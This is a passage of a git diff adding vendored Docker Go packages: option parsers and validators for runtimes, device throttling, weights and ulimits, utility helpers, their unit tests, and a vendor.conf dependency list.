"7a67485460b7642516a4ad82ecefe7f57d0c4916f530561b71a50a3f9c4e33da", + "angry_torvalds:linus", + } + invalid := map[string]string{ + "": "empty string specified for links", + "too:much:of:it": "bad format for links: too:much:of:it", + } + + for _, link := range valid { + if _, err := ValidateLink(link); err != nil { + t.Fatalf("ValidateLink(`%q`) should succeed: error %q", link, err) + } + } + + for link, expectedError := range invalid { + if _, err := ValidateLink(link); err == nil { + t.Fatalf("ValidateLink(`%q`) should have failed validation", link) + } else { + if !strings.Contains(err.Error(), 
expectedError) { + t.Fatalf("ValidateLink(`%q`) error should contain %q", link, expectedError) + } + } + } +} + +func TestParseLink(t *testing.T) { + name, alias, err := ParseLink("name:alias") + if err != nil { + t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "alias" { + t.Fatalf("Link alias should have been alias, got %s instead", alias) + } + // short format definition + name, alias, err = ParseLink("name") + if err != nil { + t.Fatalf("Expected not to error out on a valid name only format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "name" { + t.Fatalf("Link alias should have been name, got %s instead", alias) + } + // empty string link definition is not allowed + if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") { + t.Fatalf("Expected error 'empty string specified for links' but got: %v", err) + } + // more than two colons are not allowed + if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") { + t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err) + } +} + +func TestValidateDevice(t *testing.T) { + valid := []string{ + "/home", + "/home:/home", + "/home:/something/else", + "/with space", + "/home:/with space", + "relative:/absolute-path", + "hostPath:/containerPath:r", + "/hostPath:/containerPath:rw", + "/hostPath:/containerPath:mrw", + } + invalid := map[string]string{ + "": "bad format for path: ", + "./": "./ is not an absolute path", + "../": "../ is not an absolute path", + "/:../": "../ is not an absolute path", + "/:path": "path is not an absolute path", + ":": "bad format for path: :", + "/tmp:": " is not an absolute path", + ":test": "bad format 
for path: :test", + ":/test": "bad format for path: :/test", + "tmp:": " is not an absolute path", + ":test:": "bad format for path: :test:", + "::": "bad format for path: ::", + ":::": "bad format for path: :::", + "/tmp:::": "bad format for path: /tmp:::", + ":/tmp::": "bad format for path: :/tmp::", + "path:ro": "ro is not an absolute path", + "path:rr": "rr is not an absolute path", + "a:/b:ro": "bad mode specified: ro", + "a:/b:rr": "bad mode specified: rr", + } + + for _, path := range valid { + if _, err := ValidateDevice(path); err != nil { + t.Fatalf("ValidateDevice(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range invalid { + if _, err := ValidateDevice(path); err == nil { + t.Fatalf("ValidateDevice(`%q`) should have failed validation", path) + } else { + if err.Error() != expectedError { + t.Fatalf("ValidateDevice(`%q`) error should contain %q, got %q", path, expectedError, err.Error()) + } + } + } +} + +func TestVolumeSplitN(t *testing.T) { + for _, x := range []struct { + input string + n int + expected []string + }{ + {`C:\foo:d:`, -1, []string{`C:\foo`, `d:`}}, + {`:C:\foo:d:`, -1, nil}, + {`/foo:/bar:ro`, 3, []string{`/foo`, `/bar`, `ro`}}, + {`/foo:/bar:ro`, 2, []string{`/foo`, `/bar:ro`}}, + {`C:\foo\:/foo`, -1, []string{`C:\foo\`, `/foo`}}, + + {`d:\`, -1, []string{`d:\`}}, + {`d:`, -1, []string{`d:`}}, + {`d:\path`, -1, []string{`d:\path`}}, + {`d:\path with space`, -1, []string{`d:\path with space`}}, + {`d:\pathandmode:rw`, -1, []string{`d:\pathandmode`, `rw`}}, + {`c:\:d:\`, -1, []string{`c:\`, `d:\`}}, + {`c:\windows\:d:`, -1, []string{`c:\windows\`, `d:`}}, + {`c:\windows:d:\s p a c e`, -1, []string{`c:\windows`, `d:\s p a c e`}}, + {`c:\windows:d:\s p a c e:RW`, -1, []string{`c:\windows`, `d:\s p a c e`, `RW`}}, + {`c:\program files:d:\s p a c e i n h o s t d i r`, -1, []string{`c:\program files`, `d:\s p a c e i n h o s t d i r`}}, + {`0123456789name:d:`, -1, []string{`0123456789name`, `d:`}}, + 
{`MiXeDcAsEnAmE:d:`, -1, []string{`MiXeDcAsEnAmE`, `d:`}}, + {`name:D:`, -1, []string{`name`, `D:`}}, + {`name:D::rW`, -1, []string{`name`, `D:`, `rW`}}, + {`name:D::RW`, -1, []string{`name`, `D:`, `RW`}}, + {`c:/:d:/forward/slashes/are/good/too`, -1, []string{`c:/`, `d:/forward/slashes/are/good/too`}}, + {`c:\Windows`, -1, []string{`c:\Windows`}}, + {`c:\Program Files (x86)`, -1, []string{`c:\Program Files (x86)`}}, + + {``, -1, nil}, + {`.`, -1, []string{`.`}}, + {`..\`, -1, []string{`..\`}}, + {`c:\:..\`, -1, []string{`c:\`, `..\`}}, + {`c:\:d:\:xyzzy`, -1, []string{`c:\`, `d:\`, `xyzzy`}}, + + // Cover directories with one-character name + {`/tmp/x/y:/foo/x/y`, -1, []string{`/tmp/x/y`, `/foo/x/y`}}, + } { + res := volumeSplitN(x.input, x.n) + if len(res) < len(x.expected) { + t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) + } + for i, e := range res { + if e != x.expected[i] { + t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) + } + } + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/runtime.go b/vendor/github.com/docker/docker/runconfig/opts/runtime.go new file mode 100644 index 0000000000..4361b3ce09 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/runtime.go @@ -0,0 +1,79 @@ +package opts + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" +) + +// RuntimeOpt defines a map of Runtimes +type RuntimeOpt struct { + name string + stockRuntimeName string + values *map[string]types.Runtime +} + +// NewNamedRuntimeOpt creates a new RuntimeOpt +func NewNamedRuntimeOpt(name string, ref *map[string]types.Runtime, stockRuntime string) *RuntimeOpt { + if ref == nil { + ref = &map[string]types.Runtime{} + } + return &RuntimeOpt{name: name, values: ref, stockRuntimeName: stockRuntime} +} + +// Name returns the name of the NamedListOpts in the configuration. 
+func (o *RuntimeOpt) Name() string { + return o.name +} + +// Set validates and updates the list of Runtimes +func (o *RuntimeOpt) Set(val string) error { + parts := strings.SplitN(val, "=", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid runtime argument: %s", val) + } + + parts[0] = strings.TrimSpace(parts[0]) + parts[1] = strings.TrimSpace(parts[1]) + if parts[0] == "" || parts[1] == "" { + return fmt.Errorf("invalid runtime argument: %s", val) + } + + parts[0] = strings.ToLower(parts[0]) + if parts[0] == o.stockRuntimeName { + return fmt.Errorf("runtime name '%s' is reserved", o.stockRuntimeName) + } + + if _, ok := (*o.values)[parts[0]]; ok { + return fmt.Errorf("runtime '%s' was already defined", parts[0]) + } + + (*o.values)[parts[0]] = types.Runtime{Path: parts[1]} + + return nil +} + +// String returns Runtime values as a string. +func (o *RuntimeOpt) String() string { + var out []string + for k := range *o.values { + out = append(out, k) + } + + return fmt.Sprintf("%v", out) +} + +// GetMap returns a map of Runtimes (name: path) +func (o *RuntimeOpt) GetMap() map[string]types.Runtime { + if o.values != nil { + return *o.values + } + + return map[string]types.Runtime{} +} + +// Type returns the type of the option +func (o *RuntimeOpt) Type() string { + return "runtime" +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go new file mode 100644 index 0000000000..5024324298 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go @@ -0,0 +1,111 @@ +package opts + +import ( + "fmt" + "strconv" + "strings" + + "github.com/docker/docker/api/types/blkiodev" + "github.com/docker/go-units" +) + +// ValidatorThrottleFctType defines a validator function that returns a validated struct and/or an error. 
+type ValidatorThrottleFctType func(val string) (*blkiodev.ThrottleDevice, error) + +// ValidateThrottleBpsDevice validates that the specified string has a valid device-rate format. +func ValidateThrottleBpsDevice(val string) (*blkiodev.ThrottleDevice, error) { + split := strings.SplitN(val, ":", 2) + if len(split) != 2 { + return nil, fmt.Errorf("bad format: %s", val) + } + if !strings.HasPrefix(split[0], "/dev/") { + return nil, fmt.Errorf("bad format for device path: %s", val) + } + rate, err := units.RAMInBytes(split[1]) + if err != nil { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) + } + if rate < 0 { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) + } + + return &blkiodev.ThrottleDevice{ + Path: split[0], + Rate: uint64(rate), + }, nil +} + +// ValidateThrottleIOpsDevice validates that the specified string has a valid device-rate format. +func ValidateThrottleIOpsDevice(val string) (*blkiodev.ThrottleDevice, error) { + split := strings.SplitN(val, ":", 2) + if len(split) != 2 { + return nil, fmt.Errorf("bad format: %s", val) + } + if !strings.HasPrefix(split[0], "/dev/") { + return nil, fmt.Errorf("bad format for device path: %s", val) + } + rate, err := strconv.ParseUint(split[1], 10, 64) + if err != nil { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. Number must be a positive integer", val) + } + if rate < 0 { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. 
Number must be a positive integer", val) + } + + return &blkiodev.ThrottleDevice{ + Path: split[0], + Rate: uint64(rate), + }, nil +} + +// ThrottledeviceOpt defines a map of ThrottleDevices +type ThrottledeviceOpt struct { + values []*blkiodev.ThrottleDevice + validator ValidatorThrottleFctType +} + +// NewThrottledeviceOpt creates a new ThrottledeviceOpt +func NewThrottledeviceOpt(validator ValidatorThrottleFctType) ThrottledeviceOpt { + values := []*blkiodev.ThrottleDevice{} + return ThrottledeviceOpt{ + values: values, + validator: validator, + } +} + +// Set validates a ThrottleDevice and sets its name as a key in ThrottledeviceOpt +func (opt *ThrottledeviceOpt) Set(val string) error { + var value *blkiodev.ThrottleDevice + if opt.validator != nil { + v, err := opt.validator(val) + if err != nil { + return err + } + value = v + } + (opt.values) = append((opt.values), value) + return nil +} + +// String returns ThrottledeviceOpt values as a string. +func (opt *ThrottledeviceOpt) String() string { + var out []string + for _, v := range opt.values { + out = append(out, v.String()) + } + + return fmt.Sprintf("%v", out) +} + +// GetList returns a slice of pointers to ThrottleDevices. +func (opt *ThrottledeviceOpt) GetList() []*blkiodev.ThrottleDevice { + var throttledevice []*blkiodev.ThrottleDevice + throttledevice = append(throttledevice, opt.values...) 
+ + return throttledevice +} + +// Type returns the option type +func (opt *ThrottledeviceOpt) Type() string { + return "throttled-device" +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go b/vendor/github.com/docker/docker/runconfig/opts/ulimit.go new file mode 100644 index 0000000000..5adfe30851 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/ulimit.go @@ -0,0 +1,57 @@ +package opts + +import ( + "fmt" + + "github.com/docker/go-units" +) + +// UlimitOpt defines a map of Ulimits +type UlimitOpt struct { + values *map[string]*units.Ulimit +} + +// NewUlimitOpt creates a new UlimitOpt +func NewUlimitOpt(ref *map[string]*units.Ulimit) *UlimitOpt { + if ref == nil { + ref = &map[string]*units.Ulimit{} + } + return &UlimitOpt{ref} +} + +// Set validates a Ulimit and sets its name as a key in UlimitOpt +func (o *UlimitOpt) Set(val string) error { + l, err := units.ParseUlimit(val) + if err != nil { + return err + } + + (*o.values)[l.Name] = l + + return nil +} + +// String returns Ulimit values as a string. +func (o *UlimitOpt) String() string { + var out []string + for _, v := range *o.values { + out = append(out, v.String()) + } + + return fmt.Sprintf("%v", out) +} + +// GetList returns a slice of pointers to Ulimits. 
+func (o *UlimitOpt) GetList() []*units.Ulimit { + var ulimits []*units.Ulimit + for _, v := range *o.values { + ulimits = append(ulimits, v) + } + + return ulimits +} + +// Type returns the option type +func (o *UlimitOpt) Type() string { + return "ulimit" +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go b/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go new file mode 100644 index 0000000000..0aa3facdfb --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go @@ -0,0 +1,42 @@ +package opts + +import ( + "testing" + + "github.com/docker/go-units" +) + +func TestUlimitOpt(t *testing.T) { + ulimitMap := map[string]*units.Ulimit{ + "nofile": {"nofile", 1024, 512}, + } + + ulimitOpt := NewUlimitOpt(&ulimitMap) + + expected := "[nofile=512:1024]" + if ulimitOpt.String() != expected { + t.Fatalf("Expected %v, got %v", expected, ulimitOpt) + } + + // Valid ulimit append to opts + if err := ulimitOpt.Set("core=1024:1024"); err != nil { + t.Fatal(err) + } + + // Invalid ulimit type returns an error and do not append to opts + if err := ulimitOpt.Set("notavalidtype=1024:1024"); err == nil { + t.Fatalf("Expected error on invalid ulimit type") + } + expected = "[nofile=512:1024 core=1024:1024]" + expected2 := "[core=1024:1024 nofile=512:1024]" + result := ulimitOpt.String() + if result != expected && result != expected2 { + t.Fatalf("Expected %v or %v, got %v", expected, expected2, ulimitOpt) + } + + // And test GetList + ulimits := ulimitOpt.GetList() + if len(ulimits) != 2 { + t.Fatalf("Expected a ulimit list of 2, got %v", ulimits) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go new file mode 100644 index 0000000000..2a5da6da08 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go @@ -0,0 +1,89 @@ +package opts + +import ( + "fmt" + "strconv" + "strings" + + 
"github.com/docker/docker/api/types/blkiodev" +) + +// ValidatorWeightFctType defines a validator function that returns a validated struct and/or an error. +type ValidatorWeightFctType func(val string) (*blkiodev.WeightDevice, error) + +// ValidateWeightDevice validates that the specified string has a valid device-weight format. +func ValidateWeightDevice(val string) (*blkiodev.WeightDevice, error) { + split := strings.SplitN(val, ":", 2) + if len(split) != 2 { + return nil, fmt.Errorf("bad format: %s", val) + } + if !strings.HasPrefix(split[0], "/dev/") { + return nil, fmt.Errorf("bad format for device path: %s", val) + } + weight, err := strconv.ParseUint(split[1], 10, 0) + if err != nil { + return nil, fmt.Errorf("invalid weight for device: %s", val) + } + if weight > 0 && (weight < 10 || weight > 1000) { + return nil, fmt.Errorf("invalid weight for device: %s", val) + } + + return &blkiodev.WeightDevice{ + Path: split[0], + Weight: uint16(weight), + }, nil +} + +// WeightdeviceOpt defines a map of WeightDevices +type WeightdeviceOpt struct { + values []*blkiodev.WeightDevice + validator ValidatorWeightFctType +} + +// NewWeightdeviceOpt creates a new WeightdeviceOpt +func NewWeightdeviceOpt(validator ValidatorWeightFctType) WeightdeviceOpt { + values := []*blkiodev.WeightDevice{} + return WeightdeviceOpt{ + values: values, + validator: validator, + } +} + +// Set validates a WeightDevice and sets its name as a key in WeightdeviceOpt +func (opt *WeightdeviceOpt) Set(val string) error { + var value *blkiodev.WeightDevice + if opt.validator != nil { + v, err := opt.validator(val) + if err != nil { + return err + } + value = v + } + (opt.values) = append((opt.values), value) + return nil +} + +// String returns WeightdeviceOpt values as a string. 
+func (opt *WeightdeviceOpt) String() string { + var out []string + for _, v := range opt.values { + out = append(out, v.String()) + } + + return fmt.Sprintf("%v", out) +} + +// GetList returns a slice of pointers to WeightDevices. +func (opt *WeightdeviceOpt) GetList() []*blkiodev.WeightDevice { + var weightdevice []*blkiodev.WeightDevice + for _, v := range opt.values { + weightdevice = append(weightdevice, v) + } + + return weightdevice +} + +// Type returns the option type +func (opt *WeightdeviceOpt) Type() string { + return "weighted-device" +} diff --git a/vendor/github.com/docker/docker/utils/debug.go b/vendor/github.com/docker/docker/utils/debug.go new file mode 100644 index 0000000000..d203891129 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/debug.go @@ -0,0 +1,26 @@ +package utils + +import ( + "os" + + "github.com/Sirupsen/logrus" +) + +// EnableDebug sets the DEBUG env var to true +// and makes the logger to log at debug level. +func EnableDebug() { + os.Setenv("DEBUG", "1") + logrus.SetLevel(logrus.DebugLevel) +} + +// DisableDebug sets the DEBUG env var to false +// and makes the logger to log at info level. +func DisableDebug() { + os.Setenv("DEBUG", "") + logrus.SetLevel(logrus.InfoLevel) +} + +// IsDebugEnabled checks whether the debug flag is set or not. 
+func IsDebugEnabled() bool { + return os.Getenv("DEBUG") != "" +} diff --git a/vendor/github.com/docker/docker/utils/debug_test.go b/vendor/github.com/docker/docker/utils/debug_test.go new file mode 100644 index 0000000000..6f9c4dfbb0 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/debug_test.go @@ -0,0 +1,43 @@ +package utils + +import ( + "os" + "testing" + + "github.com/Sirupsen/logrus" +) + +func TestEnableDebug(t *testing.T) { + defer func() { + os.Setenv("DEBUG", "") + logrus.SetLevel(logrus.InfoLevel) + }() + EnableDebug() + if os.Getenv("DEBUG") != "1" { + t.Fatalf("expected DEBUG=1, got %s\n", os.Getenv("DEBUG")) + } + if logrus.GetLevel() != logrus.DebugLevel { + t.Fatalf("expected log level %v, got %v\n", logrus.DebugLevel, logrus.GetLevel()) + } +} + +func TestDisableDebug(t *testing.T) { + DisableDebug() + if os.Getenv("DEBUG") != "" { + t.Fatalf("expected DEBUG=\"\", got %s\n", os.Getenv("DEBUG")) + } + if logrus.GetLevel() != logrus.InfoLevel { + t.Fatalf("expected log level %v, got %v\n", logrus.InfoLevel, logrus.GetLevel()) + } +} + +func TestDebugEnabled(t *testing.T) { + EnableDebug() + if !IsDebugEnabled() { + t.Fatal("expected debug enabled, got false") + } + DisableDebug() + if IsDebugEnabled() { + t.Fatal("expected debug disabled, got true") + } +} diff --git a/vendor/github.com/docker/docker/utils/names.go b/vendor/github.com/docker/docker/utils/names.go new file mode 100644 index 0000000000..632062819c --- /dev/null +++ b/vendor/github.com/docker/docker/utils/names.go @@ -0,0 +1,9 @@ +package utils + +import "regexp" + +// RestrictedNameChars collects the characters allowed to represent a name, normally used to validate container and volume names. +const RestrictedNameChars = `[a-zA-Z0-9][a-zA-Z0-9_.-]` + +// RestrictedNamePattern is a regular expression to validate names against the collection of restricted characters. 
+var RestrictedNamePattern = regexp.MustCompile(`^` + RestrictedNameChars + `+$`) diff --git a/vendor/github.com/docker/docker/utils/process_unix.go b/vendor/github.com/docker/docker/utils/process_unix.go new file mode 100644 index 0000000000..fc0b1c8b74 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/process_unix.go @@ -0,0 +1,22 @@ +// +build linux freebsd solaris + +package utils + +import ( + "syscall" +) + +// IsProcessAlive returns true if process with a given pid is running. +func IsProcessAlive(pid int) bool { + err := syscall.Kill(pid, syscall.Signal(0)) + if err == nil || err == syscall.EPERM { + return true + } + + return false +} + +// KillProcess force-stops a process. +func KillProcess(pid int) { + syscall.Kill(pid, syscall.SIGKILL) +} diff --git a/vendor/github.com/docker/docker/utils/process_windows.go b/vendor/github.com/docker/docker/utils/process_windows.go new file mode 100644 index 0000000000..03cb855197 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/process_windows.go @@ -0,0 +1,20 @@ +package utils + +// IsProcessAlive returns true if process with a given pid is running. +func IsProcessAlive(pid int) bool { + // TODO Windows containerd. Not sure this is needed + // p, err := os.FindProcess(pid) + // if err == nil { + // return true + // } + return false +} + +// KillProcess force-stops a process. +func KillProcess(pid int) { + // TODO Windows containerd. Not sure this is needed + // p, err := os.FindProcess(pid) + // if err == nil { + // p.Kill() + // } +} diff --git a/vendor/github.com/docker/docker/utils/templates/templates.go b/vendor/github.com/docker/docker/utils/templates/templates.go new file mode 100644 index 0000000000..91c376f38f --- /dev/null +++ b/vendor/github.com/docker/docker/utils/templates/templates.go @@ -0,0 +1,42 @@ +package templates + +import ( + "encoding/json" + "strings" + "text/template" +) + +// basicFunctions are the set of initial +// functions provided to every template. 
+var basicFunctions = template.FuncMap{ + "json": func(v interface{}) string { + a, _ := json.Marshal(v) + return string(a) + }, + "split": strings.Split, + "join": strings.Join, + "title": strings.Title, + "lower": strings.ToLower, + "upper": strings.ToUpper, + "pad": padWithSpace, +} + +// Parse creates a new annonymous template with the basic functions +// and parses the given format. +func Parse(format string) (*template.Template, error) { + return NewParse("", format) +} + +// NewParse creates a new tagged template with the basic functions +// and parses the given format. +func NewParse(tag, format string) (*template.Template, error) { + return template.New(tag).Funcs(basicFunctions).Parse(format) +} + +// padWithSpace adds whitespace to the input if the input is non-empty +func padWithSpace(source string, prefix, suffix int) string { + if source == "" { + return source + } + return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix) +} diff --git a/vendor/github.com/docker/docker/utils/templates/templates_test.go b/vendor/github.com/docker/docker/utils/templates/templates_test.go new file mode 100644 index 0000000000..dd42901aed --- /dev/null +++ b/vendor/github.com/docker/docker/utils/templates/templates_test.go @@ -0,0 +1,38 @@ +package templates + +import ( + "bytes" + "testing" +) + +func TestParseStringFunctions(t *testing.T) { + tm, err := Parse(`{{join (split . ":") "/"}}`) + if err != nil { + t.Fatal(err) + } + + var b bytes.Buffer + if err := tm.Execute(&b, "text:with:colon"); err != nil { + t.Fatal(err) + } + want := "text/with/colon" + if b.String() != want { + t.Fatalf("expected %s, got %s", want, b.String()) + } +} + +func TestNewParse(t *testing.T) { + tm, err := NewParse("foo", "this is a {{ . 
}}") + if err != nil { + t.Fatal(err) + } + + var b bytes.Buffer + if err := tm.Execute(&b, "string"); err != nil { + t.Fatal(err) + } + want := "this is a string" + if b.String() != want { + t.Fatalf("expected %s, got %s", want, b.String()) + } +} diff --git a/vendor/github.com/docker/docker/utils/utils.go b/vendor/github.com/docker/docker/utils/utils.go new file mode 100644 index 0000000000..d3dd00abf4 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/utils.go @@ -0,0 +1,87 @@ +package utils + +import ( + "fmt" + "io/ioutil" + "os" + "runtime" + "strings" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/stringid" +) + +var globalTestID string + +// TestDirectory creates a new temporary directory and returns its path. +// The contents of directory at path `templateDir` is copied into the +// new directory. +func TestDirectory(templateDir string) (dir string, err error) { + if globalTestID == "" { + globalTestID = stringid.GenerateNonCryptoID()[:4] + } + prefix := fmt.Sprintf("docker-test%s-%s-", globalTestID, GetCallerName(2)) + if prefix == "" { + prefix = "docker-test-" + } + dir, err = ioutil.TempDir("", prefix) + if err = os.Remove(dir); err != nil { + return + } + if templateDir != "" { + if err = archive.CopyWithTar(templateDir, dir); err != nil { + return + } + } + return +} + +// GetCallerName introspects the call stack and returns the name of the +// function `depth` levels down in the stack. +func GetCallerName(depth int) string { + // Use the caller function name as a prefix. + // This helps trace temp directories back to their test. 
+ pc, _, _, _ := runtime.Caller(depth + 1) + callerLongName := runtime.FuncForPC(pc).Name() + parts := strings.Split(callerLongName, ".") + callerShortName := parts[len(parts)-1] + return callerShortName +} + +// ReplaceOrAppendEnvValues returns the defaults with the overrides either +// replaced by env key or appended to the list +func ReplaceOrAppendEnvValues(defaults, overrides []string) []string { + cache := make(map[string]int, len(defaults)) + for i, e := range defaults { + parts := strings.SplitN(e, "=", 2) + cache[parts[0]] = i + } + + for _, value := range overrides { + // Values w/o = means they want this env to be removed/unset. + if !strings.Contains(value, "=") { + if i, exists := cache[value]; exists { + defaults[i] = "" // Used to indicate it should be removed + } + continue + } + + // Just do a normal set/update + parts := strings.SplitN(value, "=", 2) + if i, exists := cache[parts[0]]; exists { + defaults[i] = value + } else { + defaults = append(defaults, value) + } + } + + // Now remove all entries that we want to "unset" + for i := 0; i < len(defaults); i++ { + if defaults[i] == "" { + defaults = append(defaults[:i], defaults[i+1:]...) 
+ i-- + } + } + + return defaults +} diff --git a/vendor/github.com/docker/docker/utils/utils_test.go b/vendor/github.com/docker/docker/utils/utils_test.go new file mode 100644 index 0000000000..ab3911e8b3 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/utils_test.go @@ -0,0 +1,21 @@ +package utils + +import "testing" + +func TestReplaceAndAppendEnvVars(t *testing.T) { + var ( + d = []string{"HOME=/"} + o = []string{"HOME=/root", "TERM=xterm"} + ) + + env := ReplaceOrAppendEnvValues(d, o) + if len(env) != 2 { + t.Fatalf("expected len of 2 got %d", len(env)) + } + if env[0] != "HOME=/root" { + t.Fatalf("expected HOME=/root got '%s'", env[0]) + } + if env[1] != "TERM=xterm" { + t.Fatalf("expected TERM=xterm got '%s'", env[1]) + } +} diff --git a/vendor/github.com/docker/docker/vendor.conf b/vendor/github.com/docker/docker/vendor.conf new file mode 100644 index 0000000000..bb7718bc42 --- /dev/null +++ b/vendor/github.com/docker/docker/vendor.conf @@ -0,0 +1,140 @@ +# the following lines are in sorted order, FYI +github.com/Azure/go-ansiterm 388960b655244e76e24c75f48631564eaefade62 +github.com/Microsoft/hcsshim v0.5.9 +github.com/Microsoft/go-winio v0.3.8 +github.com/Sirupsen/logrus v0.11.0 +github.com/davecgh/go-spew 6d212800a42e8ab5c146b8ace3490ee17e5225f9 +github.com/docker/libtrust 9cbd2a1374f46905c68a4eb3694a130610adc62a +github.com/go-check/check 4ed411733c5785b40214c70bce814c3a3a689609 https://github.com/cpuguy83/check.git +github.com/gorilla/context v1.1 +github.com/gorilla/mux v1.1 +github.com/kr/pty 5cf931ef8f +github.com/mattn/go-shellwords v1.0.0 +github.com/mattn/go-sqlite3 v1.1.0 +github.com/tchap/go-patricia v2.2.6 +github.com/vdemeester/shakers 24d7f1d6a71aa5d9cbe7390e4afb66b7eef9e1b3 +# forked golang.org/x/net package includes a patch for lazy loading trace templates +golang.org/x/net 2beffdc2e92c8a3027590f898fe88f69af48a3f8 https://github.com/tonistiigi/net.git +golang.org/x/sys 8f0908ab3b2457e2e15403d3697c9ef5cb4b57a9 
+github.com/docker/go-units 8a7beacffa3009a9ac66bad506b18ffdd110cf97 +github.com/docker/go-connections ecb4cb2dd420ada7df7f2593d6c25441f65f69f2 + +github.com/RackSec/srslog 456df3a81436d29ba874f3590eeeee25d666f8a5 +github.com/imdario/mergo 0.2.1 + +#get libnetwork packages +github.com/docker/libnetwork 45b40861e677e37cf27bc184eca5af92f8cdd32d +github.com/docker/go-events 18b43f1bc85d9cdd42c05a6cd2d444c7a200a894 +github.com/armon/go-radix e39d623f12e8e41c7b5529e9a9dd67a1e2261f80 +github.com/armon/go-metrics eb0af217e5e9747e41dd5303755356b62d28e3ec +github.com/hashicorp/go-msgpack 71c2886f5a673a35f909803f38ece5810165097b +github.com/hashicorp/memberlist 88ac4de0d1a0ca6def284b571342db3b777a4c37 +github.com/hashicorp/go-multierror fcdddc395df1ddf4247c69bd436e84cfa0733f7e +github.com/hashicorp/serf 598c54895cc5a7b1a24a398d635e8c0ea0959870 +github.com/docker/libkv 1d8431073ae03cdaedb198a89722f3aab6d418ef +github.com/vishvananda/netns 604eaf189ee867d8c147fafc28def2394e878d25 +github.com/vishvananda/netlink 482f7a52b758233521878cb6c5904b6bd63f3457 +github.com/BurntSushi/toml f706d00e3de6abe700c994cdd545a1a4915af060 +github.com/samuel/go-zookeeper d0e0d8e11f318e000a8cc434616d69e329edc374 +github.com/deckarep/golang-set ef32fa3046d9f249d399f98ebaf9be944430fd1d +github.com/coreos/etcd 3a49cbb769ebd8d1dd25abb1e83386e9883a5707 +github.com/ugorji/go f1f1a805ed361a0e078bb537e4ea78cd37dcf065 +github.com/hashicorp/consul v0.5.2 +github.com/boltdb/bolt fff57c100f4dea1905678da7e90d92429dff2904 +github.com/miekg/dns 75e6e86cc601825c5dbcd4e0c209eab180997cd7 + +# get graph and distribution packages +github.com/docker/distribution 28602af35aceda2f8d571bad7ca37a54cf0250bc +github.com/vbatts/tar-split v0.10.1 + +# get go-zfs packages +github.com/mistifyio/go-zfs 22c9b32c84eb0d0c6f4043b6e90fc94073de92fa +github.com/pborman/uuid v1.0 + +# get desired notary commit, might also need to be updated in Dockerfile +github.com/docker/notary v0.4.2 + +google.golang.org/grpc v1.0.2 
+github.com/miekg/pkcs11 df8ae6ca730422dba20c768ff38ef7d79077a59f +github.com/docker/go v1.5.1-1-1-gbaf439e +github.com/agl/ed25519 d2b94fd789ea21d12fac1a4443dd3a3f79cda72c + +# When updating, also update RUNC_COMMIT in hack/dockerfile/binaries-commits accordingly +github.com/opencontainers/runc 9df8b306d01f59d3a8029be411de015b7304dd8f https://github.com/docker/runc.git # libcontainer +github.com/opencontainers/runtime-spec 1c7c27d043c2a5e513a44084d2b10d77d1402b8c # specs +github.com/seccomp/libseccomp-golang 32f571b70023028bd57d9288c20efbcb237f3ce0 +# libcontainer deps (see src/github.com/opencontainers/runc/Godeps/Godeps.json) +github.com/coreos/go-systemd v4 +github.com/godbus/dbus v4.0.0 +github.com/syndtr/gocapability 2c00daeb6c3b45114c80ac44119e7b8801fdd852 +github.com/golang/protobuf 1f49d83d9aa00e6ce4fc8258c71cc7786aec968a + +# gelf logging driver deps +github.com/Graylog2/go-gelf aab2f594e4585d43468ac57287b0dece9d806883 + +github.com/fluent/fluent-logger-golang v1.2.1 +# fluent-logger-golang deps +github.com/philhofer/fwd 899e4efba8eaa1fea74175308f3fae18ff3319fa +github.com/tinylib/msgp 75ee40d2601edf122ef667e2a07d600d4c44490c + +# fsnotify +github.com/fsnotify/fsnotify v1.2.11 + +# awslogs deps +github.com/aws/aws-sdk-go v1.4.22 +github.com/go-ini/ini 060d7da055ba6ec5ea7a31f116332fe5efa04ce0 +github.com/jmespath/go-jmespath 0b12d6b521d83fc7f755e7cfc1b1fbdd35a01a74 + +# logentries +github.com/bsphere/le_go d3308aafe090956bc89a65f0769f58251a1b4f03 + +# gcplogs deps +golang.org/x/oauth2 2baa8a1b9338cf13d9eeb27696d761155fa480be +google.golang.org/api dc6d2353af16e2a2b0ff6986af051d473a4ed468 +google.golang.org/cloud 